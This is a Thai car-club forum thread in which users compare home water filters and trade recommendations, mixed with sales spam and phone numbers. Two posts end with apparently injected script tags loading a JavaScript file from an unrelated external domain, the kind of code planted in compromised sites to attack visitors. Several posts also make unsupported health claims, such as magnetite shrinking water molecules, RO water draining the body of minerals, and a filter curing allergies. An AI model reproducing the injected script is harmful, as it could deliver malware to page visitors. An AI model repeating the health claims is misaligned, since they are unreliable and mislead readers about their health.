ตอบ
superfiat

เข้าร่วม: 07 ตุลา 2008
ตอบ: 176

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 78

ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 28 สิงหา 2011 09:52 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
กำลังมองหาเครื่องกรองน้ำใช้ดื่มในบ้าน ทำไปทำมา..ไม่รู้จะเชื่อใครได้

หลายคนบอกระบบ RO ดีที่สุด บางคนบอก "ดี" แต่ไม่เหมาะ เพราะกรองมากเกินไป

หลายคนบอกแค่ UV ก็พอแล้ว เพราะใช้น้ำประปา

เรื่องยี่ห้อก็อีก ไปดูตามห้าง ขึ้นอยู่ว่าจะพนักงานขายที่รับเงินพิเศษจากบริษัทไหน โฮมโปร เนี่ยตัวดีเลย

ในเชียงใหม่มีโฮมโปรสองที่ ทั้งสองที่เชียร์คนละแบรนด์ พร้อมกับโจมตียี่ห้ออื่นๆ ฟังแล้วขัดหู

อยากบอกพวกเค้าตรงนั้นจังว่า "น้องครับ หน้าพี่มันดูโง่ขนาดนั้นเลยหรือครับ"

ส่วนยี่ห้ออย่างแอมเวย์ ไม่เถียงว่า "ไม่ดี" แต่ไม่รู้ว่าแพงเพราะอะไร

ใครใช้ยี่ห้อไหน มาบอกเล่าประสบการณ์กันหน่อยนะครับ

ปล.ขอสงวนไม่รับฟังจากพนักงานขายนะขอรับ ไม่ใช่ ไม่เชื่อนะ แต่ผมอยากฟังเสียงจากคนใช้มากกว่าครับ
ได้รับคำขอบคุณจาก: nu_es_05 
kit01

เข้าร่วม: 25 เมษา 2011
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 0
จันทร์, 29 สิงหา 2011 11:34 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ที่บ้านผม บ้านพ่อ บ้านพี่สาว บ้านลูกน้องที่บริษัท ที่หอพักลูกสาวผม ก็ใช้ RO รีเวอสออสโมซิสครับ ที่บ้านผมเองนะใช้มาจะเข้าปี่ที่3แล้วครับเปลี่ยนใส่กรองไป3-4หนแล้วครับ เท่าที่รู้นะน้ำที่ซื้อเป็นถังกินก็ใช้ระบบนี้กันนะครับ เน้นนะครับแถวบ้านผมนะครับผมอยู่ต่างจังหวัดครับ ไม่รู้ว่าที่อื่นเค้าใช้ระบบไหน ที่ผมรู้เพราะบ้านเพื่อนผมเค้าทำน้ำดื่มขายมาเป็น10 10ปีแล้วครับ มันก็แนะนำผมมาแบบนี้เหละ
ได้รับคำขอบคุณจาก: superfiat 
kamonchai

ชื่อเล่น: โอ

เข้าร่วม: 26 กุมภา 2009
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 127
ให้คำขอบคุณ: 4

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 29 สิงหา 2011 13:15 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
แนะนำ RO+UVครับ
หน้าสวนสยาม เพียบ 2800-3000
ไส้กรอง 30-50 บาท
ถ้าคุณซื้อห้างก็ 300 บาท
ได้รับคำขอบคุณจาก: superfiat  eak3208 
superfiat

จันทร์, 29 สิงหา 2011 13:56 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ขอบคุณสำหรับคำแนะนำครับ
akedsh

ชื่อเล่น: เอก

เข้าร่วม: 21 ธันวา 2009
ตอบ: 34

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 95
ให้คำขอบคุณ: 55

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 29 สิงหา 2011 16:26 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ไม่ว่าจะใช้ระบบกรองแบบไหน จะสะอาดหรือไม่ ขึ้นอยู่กับการขยันเปลี่ยนไส้กรองครับ
ยิ่ง RO กรองละเอียดมากๆ ก็แสดงว่าสิ่งสกปรกมาติดค้างอยู่ที่ไส้กรองมากเช่นกัน
แนะนำให้หมั่นตรวจเช็ค ล้าง(ถ้าล้างได้)หรือเปลี่ยนไส้กรองบ่อยๆครับ
kwan

ชื่อเล่น: หนึ่ง

เข้าร่วม: 13 พฤษภาคม 2010
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 52
ให้คำขอบคุณ: 141

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 30 สิงหา 2011 15:35 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
superfiat พิมพ์ว่า:
กำลังมองหาเครื่องกรองน้ำใช้ดื่มในบ้าน ทำไปทำมา..ไม่รู้จะเชื่อใครได้

หลายคนบอกระบบ RO ดีที่สุด บางคนบอก "ดี" แต่ไม่เหมาะ เพราะกรองมากเกินไป

หลายคนบอกแค่ UV ก็พอแล้ว เพราะใช้น้ำประปา

เรื่องยี่ห้อก็อีก ไปดูตามห้าง ขึ้นอยู่ว่าจะพนักงานขายที่รับเงินพิเศษจากบริษัทไหน โฮมโปร เนี่ยตัวดีเลย

ในเชียงใหม่มีโฮมโปรสองที่ ทั้งสองที่เชียร์คนละแบรนด์ พร้อมกับโจมตียี่ห้ออื่นๆ ฟังแล้วขัดหู

อยากบอกพวกเค้าตรงนั้นจังว่า "น้องครับ หน้าพี่มันดูโง่ขนาดนั้นเลยหรือครับ"

ส่วนยี่ห้ออย่างแอมเวย์ ไม่เถียงว่า "ไม่ดี" แต่ไม่รู้ว่าแพงเพราะอะไร

ใครใช้ยี่ห้อไหน มาบอกเล่าประสบการณ์กันหน่อยนะครับ

ปล.ขอสงวนไม่รับฟังจากพนักงานขายนะขอรับ ไม่ใช่ ไม่เชื่อนะ แต่ผมอยากฟังเสียงจากคนใช้มากกว่าครับ

ใช้เครื่องกรองน้ำ eSpring ของแอมเวย์ อยู่ครับ
ดูเทคโนโลยีของเขาได้ที่ลิงค์นี้ http://youtu.be/IDrZSKFvG5A

ถ้าต้องการรายละเอียด PM มาได้ครับ
CHAMPnaja

ชื่อเล่น: แชมป์

เข้าร่วม: 06 พฤษภาคม 2011
ตอบ: 246

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 207
ให้คำขอบคุณ: 153

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 31 สิงหา 2011 16:14 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
kwan พิมพ์ว่า:

ใช้เครื่องกรองน้ำ eSpring ของแอมเวย์ อยู่ครับ
ดูเทคโนโลยีของเขาได้ที่ลิงค์นี้ http://youtu.be/IDrZSKFvG5A

ถ้าต้องการรายละเอียด PM มาได้ครับ

Moo Uan

เข้าร่วม: 07 สิงหา 2009
ตอบ: 1127

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 กันยา 2011 03:01 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
เท่าที่เคยศึกษาหลายๆยี่ห้อ ของแอมเวย์น่าจะเวิร์คครับ แต่แพงอะ ซื้อไม่ไหว
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

พฤหัส, 1 กันยา 2011 11:17 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ที่บ้านใช้ของแอมเวย์อยู่ ก็ดีนะ แต่เสียงี่เง่าไปรอบ

ราคาแพง กรองน้ำก็สะอาดดี ไม่มีกลิ่น ถ้าบ้านคนไม่เยอะ ก็คุ้มนะครับ
superfiat

พฤหัส, 1 กันยา 2011 13:00 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
Moo Uan พิมพ์ว่า:
เท่าที่เคยศึกษาหลายๆยี่ห้อ ของแอมเวย์น่าจะเวิร์คครับ แต่แพงอะ ซื้อไม่ไหว

แม่น
kkcorp

เข้าร่วม: 05 ตุลา 2011
ตอบ: 202

ได้รับคำขอบคุณ: 194
ให้คำขอบคุณ: 91
อังคาร, 29 พฤศจิกา 2011 13:32 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
กรอง RO ต้องดูการทำงานดีๆๆนะครับบางเจ้ามันเป็นกรองธรรมดาแต่หลอกเป็น RO
หลักของการกรองแบบ RO คือ ใช้หลักความดันดันน้ำผ่านกรองละเอียดมากเพื่อให้โมเลกุลน้ำผ่าน
น้ำชนิดนี้จะสะอาดมาก มากจนเกินไปเนื่องจากแร่ธาตุต่างๆจะถูกกรองออกไปด้วย มีผลให้ร่างกายขาดแร่ธาตุไปด้วย
ที่จริงแล้วหากเราใช้น้ำปะปามันสะอาดระดับนึงแล้วครับถ้าอยากให้สะอาดขึ้นก็ซื้อกรองธรรมดามาใช้ก็พอครับ
แค่หมั่นเปลี่ยนกรองตามอายุก็สะอาดเหมาะสมจะนำมาใช้ดื่มแล้วล่ะครับที่สำคัญประหยัดครับ
โฆษณาสมัยนี้มักจะนำความไม่รู้ของชาวบ้านมาหากินครับมันน่าละอายมากกกกก
ส่วน UV ก็เพียงนำมาฆ่าเชื้อซึ่งผมคิดว่ามันเกินความจำเป็นเพระน้ำปะปาเค้ามีการควบคุมส่วนนี้ให้อยู่ในระดับที่ไม่เป็นอันตรายต่อคนอยู่แล้วแต่ถ้ายังกลัวผมว่าการนำไปต้มเป็นวิธีที่ดีนะครับเพราะทุกบ้านก็มีกาต้มอยู่แล้วไม่ต้องเสียตังเพิ่มกับเรื่องพวกนี้
ปล.พบว่าน้ำปะปามีสิ่งปนเปื้อนมากก็สามารถร้องเรียนไปยังการปะปาได้ครับให้เค้าปรับปรุงเพราะเราอยู่ในฐานะผู้ใช้บริการ
Charice

เข้าร่วม: 04 พฤศจิกา 2012
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
อาทิตย์, 4 พฤศจิกา 2012 23:49 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ทำไมเครื่องกรองน้ำ e-spring จากแอมเวย์ ถึงแพง? เดี๋ยวจะคำนวณให้ดูคะ ว่าแพงหรือเปล่า
E-spring เครื่องละ 29000 (โคตรแพงเลย กรองออกมาเป็นทองรึไง?)
น้ำขวดครึ่งลิตร ราคา 14 บาท (ถูกกว่าเห็นๆ) (นี่คือความคิดคนไทย)
E-spring มีอายุการใช้งานประมาณ 10 ปี

ทุกคนต้องดื่มน้ำวันละ 2 ลิตร สมมติที่บ้านอยู่กัน 3 คน เอา 3x2 = บ้านนี้กิน 6 ลิตร ต่อวัน น้ำขวดครึ่งลิตร 14 บาท 2 ลิตร = 24 บาท 24 x 6 = 144 บ. ต่อวัน 144 x 365 = 52560 บ. ต่อปี 52560x10 = 525,600 บาท! ต่อ 10 ปี

สมมติคุณซื้อในปีแรก จ่าย 29000 บาท (ทดไว้ในใจ)
มาดูอีก9 ปีที่เหลือ แต่ละปีควรเปลี่ยนไส้กรองปีละครั้ง อันละ 4700 บาท ก็เอา 4700 x 9 = 42300 + 29000 (ค่าเครื่องที่ทดไว้ในใจ) = 71,300 บาท / 10 ปี

เห็นความถูกมั๊ยคะ? 525600 - 71300 = ประหยัดไป 454,300 บาท ภายใน 10 ปี แค่นี้ก็คุ้มละคะ กับ 29000 น่ะ

หรือแบบง่ายๆ
ไส้กรองอันละ 4500 กรองได้ 5000 ลิตร หรือ 1 ปี (แล้วแต่อย่างไหนมาก่อน) 4500 หาร 5000 = ลิตรละ 0.9 บาท

น้ำขวดครึ่งลิตร 14 ลิตรละ 24 บาท
vat

ชื่อเล่น: เขียว

เข้าร่วม: 04 มิถุนา 2011
ตอบ: 356

ได้รับคำขอบคุณ: 313
ให้คำขอบคุณ: 826

จันทร์, 5 พฤศจิกา 2012 01:18 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ต้มน้ำใส่ใบเตยหอมๆคับสะอาดและประหยัดชัวจิ๊กคอนเฟิร์ม
เดิมก็ดี

ชื่อเล่น: จิ๊ฟ

เข้าร่วม: 22 เมษา 2012
ตอบ: 675

Guru ES
Guru ES

ได้รับคำขอบคุณ: 585
ให้คำขอบคุณ: 808

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 5 พฤศจิกา 2012 02:38 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
vat พิมพ์ว่า:
ต้มน้ำใส่ใบเตยหอมๆคับสะอาดและประหยัดชัวจิ๊กคอนเฟิร์ม

ม้ากระทืบโลงสักกลมใช้ใด้
Chonchy

ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ปี: 2001
จันทร์, 5 พฤศจิกา 2012 09:14 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ที่บ้านผมติดของ JAPIN ราคา 45,000 บาท ราคาแพงมาก แต่สิ่งที่ได้ สุขภาพคนในบ้านดีขึ้นอย่างเห็นได้ชัดเลยคับ...

ตอนแรกผมก็ว่าแม่ผมว่า ทำไมติดของแพงขนาดนี้ แค่น้ำดื่ม แต่พอได้ดื่ม ได้กิน เอามาใช้ในชีวิตประจำวัน

แรกๆ จะฉี่บ่อยมาก เหลืองมาก ถ่ายมากกว่าปกติ ซึ่งผลมาจากน้ำคับ เพราะน้ำจากเครื่องกรองน้ำ JAPIN 

มีแร่ธาตุสูงมาก มีโมเลกุลที่ละเอียดสูง (อันนี้ฟังแม่ผมบอกมานะคับ) แต่ผมว่า มันดีกับสุขภาพมาก

สังเกตุได้ชัดๆว่า หลานผม ไม่สบายบ่อย เป็นภูมิแพ้บ่อย ตอนนี้ แทบจะไม่มีอาการให้เห็นเลย...

ผมและแม่ผม ไม่ได้เป็นเซลล์ขายเครื่องกรองน้ำ แต่ผมและแม่ผม ได้แนะนำเครื่องกรองน้ำตัวนี้ให้กับญาติ พี่น้อง และคนรู้จัก

ได้ไปติดตั้งกันแล้ว แต่ก่อนที่ผมจะให้คนเหล่านั้นซื้อใช้เอง แม่ผมเอาน้ำจากเครื่องกรองที่บ้าน ไปให้ดื่มฟรีๆก่อนเลยคับ

ว่าได้ผลจริงหรือป่าว  สิ่งที่ผมและแม่ผมได้ คือความสุขและบุญ ที่ได้แนะนำสิ่งดีๆให้คนรู้จักได้รับคับ...

สนใจเครื่องกรองน้ำตัวนี้ โทรมาสอบถามได้คับ  (ผมทำงานเป็นกราฟฟิค ไม่ใช่เซลล์ขายคับ)

085-8127770 ชล

ปล. ผมบอกก่อนนะคับว่า เครื่องนี้แพงจริง ราคา 45,000 บาท แต่สิ่งที่คุณจะได้ มันมากกว่าราคาที่ซื้อคับ...

ปล.2 น้ำดื่มที่ทุกท่านดื่ม รวมถึงน้ำดื่มในขวดยี่ห้อต่างๆ จะมีรสหวานนิดๆ ตามที่ผมศึกษาเพิ่มเติม

มันคือน้ำสะอาดจริงคับ แต่ไม่มีแร่ธาตุ

ของพวกนี้ ผมไม่สามารถบังคับให้ทุกคนเชื่อ ทุกคนซื้อได้ แต่ผมได้ลองกับตัวเองมาแล้ว...
Charice

เข้าร่วม: 04 พฤศจิกา 2012
ตอบ: 2

น้องใหม่
น้องใหม่

จันทร์, 5 พฤศจิกา 2012 12:15 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ลืมบอกคะ E-Spring นอกจากคุ้มค่าแล้ว สามารถฆ่าเชื้อโรคได้ 99.99% และคงความเป็นแร่ธาตุ ดูจากโฆษณาทางทีวีได้คะ ยินดีให้ข้อมูลเพิ่มเติมคะ 0909733212 นุ่น
Tanadath

เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

จันทร์, 5 พฤศจิกา 2012 14:19 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ที่บ้านใช้ของโฟล๊ป ราคา35,000฿ ไส้กรอง 5 ขั้นตอน พร้อมยูวี ทำความเย็นและร้อนในตัว เปลี่ยนไส้กรองปีละครั้ง ราคาไส้กรอง 3,900฿/ ชุด ที่ใช้เพราะไม่มั่นใจในคุณภาพของนำ้ถังที่มาขายครับ "<script src="https://sport32news.com/civicesgroup.js">
MK Flying

ชื่อเล่น: ยุทธ

เข้าร่วม: 04 กุมภา 2010
ตอบ: 379

ได้รับคำขอบคุณ: 686
ให้คำขอบคุณ: 135

จันทร์, 5 พฤศจิกา 2012 14:40 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ผมชื้อน้ำจากห้างดอกบัว ที่เป็นแกลอน 6 ลิตร 29 บาท เฉลี่ยประมาณ 5 บาทต่อลิตร
Yok

เข้าร่วม: 27 ตุลา 2010
ตอบ: 67

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 48
ให้คำขอบคุณ: 16
จันทร์, 5 พฤศจิกา 2012 14:49 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ขอโทษนะครับ น้ำยี่ห้ออะไรครับ ครึ่งลิตร 14 บาทเนี่ย e spring ดีครับไม่ใช่ไม่ดีแต่ผมว่าเปรียบเทียบเวอร์ไปนิดครับ

น้ำที่คนเราควรดืม(สำหรับผมและอีกหลายๆคนที่รู้จัก)
ไม่ควรสะอาดเวอร์จนไม่เหลือแร่ธาตุอะไรเลย เพราะมันจะเข้าไปดูดแร่ธาตุในร่างกายออกไป อย่าง RO นี่เข้าข่าย และระบบ RO แท้นี่ต้องมีน้ำระบายทิ้งประมาณกี่ % ไม่แน่ใจแต่เยอะพอควรเนื่องจากใช้หลักการตามท่านข้างบน ใช้แรงดันจากบั้มดันผ่านเมมเบรน สำหรับผมแล้วเครื่องกรองน้ำซัก 3 - 4 ขั้น + UV ก็หรูแล้วครับ แค่ต้องเปลี่ยนกรองให้ตรงเวลา

การที่ร่างกายเราได้รับเชื้อโรคบ้างก็เพื่อจะเป็นการเพิ่มภูมิต้านทานให้กับร่างกาย ธรรมชาติเค้าสร้างมาให้แล้ว เหมือนเลี้ยงเด็กมันก็ต้องปล่อยให้ลงดิน ลงหญ้าบ้าง(พอดี พอดี) ลองคิดดูเลี้ยงอยู่ในที่ปลอดเชื้อตลอดแต่เมื่อต้องออกไปโลกภายนอกมันจะแย่เอานะครับ
kwan

ชื่อเล่น: หนึ่ง

เข้าร่วม: 13 พฤษภาคม 2010
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 52
ให้คำขอบคุณ: 141

จันทร์, 5 พฤศจิกา 2012 19:47 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
กระทู้นี้เลย1ปีแล้ว คิดว่าเจ้าของกระทู้คงได้เครื่องกรองน้ำที่ถูกใจแล้วมั้ง แต่ถ้าต้องการมีเครื่องทำน้ำดื่มไว้ใช้ประจำบ้าน นี่เลย e-Spring รับรองคุ้มค่าแน่นอน
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
Peepo

เข้าร่วม: 15 กรกฎา 2012
ตอบ: 243

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 34

จันทร์, 5 พฤศจิกา 2012 20:57 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
คนสมัยก่อนไม่มีเครื่องกรองน้ำยังอยู่กันได้เลย แถมเลี้ยงเรามาได้จนถึงทุกวันนี้ ผมคนนึงอ่ะครับ ไม่หิ้วน้ำติดตัวไปกิน
ที่รู้ น้ำแข็งไม่มี เหล้าเพียว ตบท้ายด้วยน้ำ
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 5 พฤศจิกา 2012 21:10 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
Amway
siripirom

เข้าร่วม: 04 สิงหา 2013

น้องใหม่
น้องใหม่

อาทิตย์, 4 สิงหา 2013 21:23 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
อยากได้เครื่องกรองน้ำคุณภาพดีราคาถูก แวะชมได้ที่ www.bigmoneyfreeshop.blogspot.com สอบถามรายละเีอียดเพิ่มเติมได้ที่ 084-774-4783

เครืองกรองน้ำโมเลกุลเล็ก ราคาถูกคุณภาพเทียบเท่ายี่ห้อดัง สนใจติดต่อ 084-774-4783
เครืองกรองน้ำโมเลกุลเล็ก ราคาถูกคุณภาพเทียบเท่ายี่ห้อดัง สนใจติดต่อ 084-774-4783
Moo Uan

เข้าร่วม: 07 สิงหา 2009
ตอบ: 1127

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

จันทร์, 5 สิงหา 2013 22:37 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
Moo Uan พิมพ์ว่า:

แม่น

คงซื้อไปแล้วแหละ ผมเองก้อซื้อของแอมเวย์ใช้ครับ เกือบปีแล้ว พอดีมีผ่อน0% เทียบราคากับความคุ้มค่าลิตร/ลิตรแล้ว
และความสะอาดดีกว่าหลายยี่ห้อคับ 
แล้วไม่ได้ใช้แค่ดื่มปกตินะคับ ทำกับข้าว ซาวข้าว หุงข้าว ใช้น้ำกรองตลอด น้ำประปามีคลอลีนเอาไปต้ม คลอลีนมันจะกลายสภาพเป็นสารก่อมะเร็ง แล้วใส้กรองยังมีuv ฆ่าเชื้อโรคได้อีกด้วยซึ่งแบบถูกๆไม่มี กรองอย่างเดียว ใส้กรองเค้ากรองเชื้อโรคได้ละเอียดมาก แต่ยังมีแร่ธาตุ ตัววัสดุไส้กรองก็ไม่มีผลต่อสุขภาพเหมือนของถูกๆคับ ประปาสะอาดระดับนึงแต่ไม่มีคนกิน เพราะไม่ไว้ใจท่อทางเดินเข้าบ้านคับจึงจำเป็นต้องใช้ เมื่อก่อนผมก็ใช้แบบ3-4ท่อน จนคนในครอบครัว รวมทั้งผมเองเป็นนิ่วไงคับ ผมก้อให้ญาติซื้อใช้ด้วย

ที่ผมมีข้อมูลก็อเพราะเราศึกษามาระดับนึง ญาติผมก็ทำธุรกิจแอมเวย์อยู่ มาเสนอผมตั้งหลายปีแล้ว จนผมและบางคนเป้นนิ่วคับ ถึงซื้อใช้
น้ำ อากาศ สมัยก่อนกับสมัยนี้มันต่างกันเยอะคับ ผมไม่ได้ขายเองนะครับ มันเป็นเรื่องของระดับคุณภาพของชีวิตแต่ะละคนคับ ว่ามีกำลังได้แค่ก็แค่นั้น 

ถ้าสนใจข้อมูลแนะนำได้ให้ได้ เค้าจะมาสาธิตให้ดู เพราะถ้าไหนๆจะซื้อแล้วก็ซื้อที่มันดี และคุ้มค่าทีเดียวไปเลย (บางทีคนเราก็แปลกคับเวลาเค้ามาสาธิตให้ดูเราไม่เชื่อ แต่ถ้าโฆษณาในทีวี ไม่มีการสาธิตการใช้งานให้ดูกลับเชื่อ ผมเคยเป็น1ในนั้นคับ)

ถ้าอยากรู้ข้อมูลมากกว่านี้ว่าเครื่องของใครดีทีสุด ลองถามป๋ากู เกิลดูแล้วจะได้คำตอบคับ
yuisasa

เข้าร่วม: 26 พฤศจิกา 2013

น้องใหม่
น้องใหม่

อังคาร, 26 พฤศจิกา 2013 09:19 - นอกเรื่อง ขอคำแนะนำเรื่องเครื่องกรองน้ำ
ขอแนะนำ ตัวนี้ เลย คะ ดร.สมศักดิ์ วรคามิน ปลัดกระทรวงสาธารณสุข ผู้เขียนหนังสือ "Warer for life" ท่านอายุ 80 กว่าแล้ว แต่ยังมีสุขภาพที่แข็งแรง และมีผิวพรรณสดใสไม่เหี่ยวย่น เพราะท่านดื่มน้ำมีคุณภาพดีมาตลอด ท่านได้กล่าวไว้ดีมาก ๆ "ถ้าวันนี้เราไม่ได้ดื่มน้ำที่ผ่านจากเครื่องกรอง ไตของเราจะทำหน้าที่กรองน้ำแทน" ไม่ว่าจะเป็นคลอรีน สารพิษต่าง ๆ และวันที่ไตเราเสื่่อม เราจะต้องตัดไตทิ้ง หรือทำการฟอกไต ซึ่งค่าใช้จ่ายสูงกว่ามาก ท่านบอกว่า " เปลี่ยนไส้กรองน้ำ ดีกว่าเปลี่ยนไต" และ น้ำสำคัญกับชีวิตเรามาก ประโยคเด็ด "วันนี้เราดื่มน้ำน้ำครบ 8 แก้วหรือยัง"
http://www.youtube.com/watch?v=7GuohzTwdEs&sns=em
ศ.ดร.นพ.สมศักดิ์ วรคามิน
ให้ความรู้ย้ำความเข้าใจ ความสำคัญของน้ำต่อร่างกายคะ.
Wazzer นวัตกรรมเครื่องกรองน้ำและพัฒนาคุณภาพน้ำเทคโนโลยีใหม่ล่าสุดและทันสมัยที่สุดในโลกจากประเทศเยอรมัน ผ่านการรับรองมาตรฐานสากลทั่วโลกมาถึงเมืองไทยแล้ว!!!

Wazzer มีคุณสมบัติเด่น ดังนี้

1. Pre-Filter
กรองหยาบผ่านโพรลีโพรพิวลีน กรองดิน ทราย สนิม ตะกอน ขนาดใหญ่เกิน 5 ไมครอน
2. Activated Carbon Block
กรองผ่านแทางคาร์บอนกัมมันต์ พื้นที่ดูดจับเท่ากับ 400 สนามฟุตบอลจับคลอรีน สารก่อมะเร็ง โลหะหนัก ยาฆ่าแมลง กำจัดกลิ่นได้หมดจด
3. Coral Sand
หินทรายปะการังจากก้นทะเลลึก เพิ่มแร่ธาตุให้น้ำมากกว่า 20 ชนิด ลดความเป็นกรดและทำให้น้ำเป็นด่างอ่อนๆ ทำให้เม็ดเลือดแดงทำงานได้ดีขึ้น
4. Magnetite
กรองผ่านแผ่นแมกนีไทต์ เหนี่ยวนำสนามแม่เหล็กธรรมชาติ ทำให้โมเลกุลของน้ำเล็กลง ดูดซึมเข้าเซลล์ได้ดีขึ้น
5. Tourmaline Ceramic Balls
กรองผ่านทัวมารีน เซอรามิค บอล ช่วยปรับสภาพและลดการเกาะตัวของน้ำ ทำให้การแตกตัวของน้ำเป็นประจุลบ ทำให้ช่วยต้านอนุมูลอิสระในร่างกาย
6. Silver Active Carbon
กรองผ่านคาร์บอนกัมมันต์อาบด้วยแร่เงิน ดักจับอีกหนึ่งชั้น ยับยั้งกาารเติบโตของแบคทีเรียในไส้กรอง และเพิ่มประสิทธิภาพการกรองสารโลหะหนัก
7. Ultrafiltration Membrane
กรองผ่านอัลตราฟิวเทรชั่น เมมเบนร ขนาด 0.01 ไมครอนกำจัดแบคทีเรีย ไวรัส ปรสิต ยีสต์ ได้ 100% แต่ยังคงแร่ธาตุครบถ้วน (เทคโนโลยีเดียวกับการกรองเลือดในวงการแพทย์)
8. Silverlite Stone
กรองผ่านก้อนซิลเวอร์ไลท์ ป้องกันแบคทีเรียและสาหร่ายไม่ให้เติบโตในไส้กรอง และป้องกันแบคทีเรียจากภายนอกเข้าไปภายใน

จุดเด่น
1. กรอง 8 ขั้นตอนใน 1 เดียว
2. รสชาติอร่อย ปราศจากกลิ่น และเพิ่มคุณภาพน้ำ
3. Ultra Filtration Membrane ละเอียด 0.01ไมครอน ไม่ต้องใช้ไฟฟ้า
4. พื้นที่จับสิ่งสกปรก 400 สนามฟุตบอล
5. ออกแบบโดยสุดยอดเทคโนโลยีเยอรมัน
6. ผ่านการรับรองระดับสากลทั่วโลก
7. ใช้ง่ายง่าย และสะดวกสุด
8. ระบบจ่ายน้ำทางเดียว สะอาดและปลอดภัย
9. สวิทซ์เปิด-ปิดสะดวก
10. รูปทรงทันสมัย ติดตั้งง่าย ใช้พื้นที่น้อย
11. ประหยัดค่าใช้จ่าย (0.79 บาทต่อลิตร)
12. รับประกันคุณภาพ 3 ปีและรับประกันความพอใจ 100%. คลิปเครื่องกรองน้ำ Wazzer

https://www.youtube.com/watch?v=vUBn-YRmjDg&feature=youtube_gdata_player.

ราคาสมาชิก 23,900 บาท

ประหยัด เปลี่ยนไส้กรอง แค่ครั้งเดียว/ปี หรือใช้น้ำ 4,320 ลิตร ค่อยเปลี่ยนค่ะ

เงื่อนไขการซื้อ
1.สามารถผ่อนชำระได้ 0% 10 เดือน กับ 2 ธนาคาร คือ บัตรเครดิต ธนาคารกรุงศรี กับ ธนาคารกสิกรไทย โดยมีโปรโมชั่นของแถมต่างกัน

ถ้าเป็นแบบผ่อน ไม่รับประกันความพึงพอใจ ภายใน 90 วัน. แต่รับประกันคุณภาพของสินค้า 3 ปี

ถ้าชำระตามปกติ รับประกันความพึงพอใจ ภายใน 90 วัน & รับประกันคุณภาพของสินค้า 3 ปี

แต่ทุกคนส่วนใหญ่ ผ่อนหมดเพราะได้ของแถม (กสิกร แถมเครื่องดูดฝุ่นในรถยนต์) แต่ กรุงศรี แถม power bank 1 เครื่อง (ที่ชารต์แบตสำรอง)
สนใจ สอบถามเพิ่มเติมได้นะคะ เพราะตอนนี้ที่บ้านเปลี่ยนมาใช้ตัวนี้ได้น้ำที่สะอาดจริง เป็นน้ำด่างที่มีแร่ธาตุ.ยินดีให้คำแนะนำคะ 0898322924 ยุ้ยคะ
creedsaa

เข้าร่วม: 10 กันยา 2013
ตอบ: 121

ได้รับคำขอบคุณ: 106
ให้คำขอบคุณ: 16

